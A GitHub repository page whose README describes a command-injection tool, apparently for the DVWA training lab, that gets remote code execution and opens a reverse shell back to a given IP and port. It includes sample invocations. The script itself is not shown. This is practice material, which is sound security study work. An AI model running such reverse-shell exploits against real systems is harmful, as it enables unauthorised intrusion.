Skip to content

Kwangyun/DVWA-Exploitation-Tools

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

12 Commits
 
 
 
 
 
 

Repository files navigation

Web Exploitation Tools

This repository contains a collection of web exploitation tools that I have developed to target vulnerabilities in the DVWA application

Command Injection RCE (CInjectionRCE.py)

The Command Injection RCE tool allows you to test for command injection vulnerabilities and perform Remote Code Execution (RCE) on a target system.

Usage

To use the Command Injection RCE tool, follow these steps:

python CInjectionRCE.py -u <URL> -p <Revershell Port> -i <Your IP>

Replace the with the target URL of the vulnerable application, with the desired port for the reverse shell connection, and with your IP address.

  python CInjectionRCE.py -u http://127.0.0.1/vulnerabilities/exec/ -p 1234 -i 192.168.45.193

This command will run the script against the specified target URL, using port 1234 for the reverse shell connection, and IP address 192.168.45.193.

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages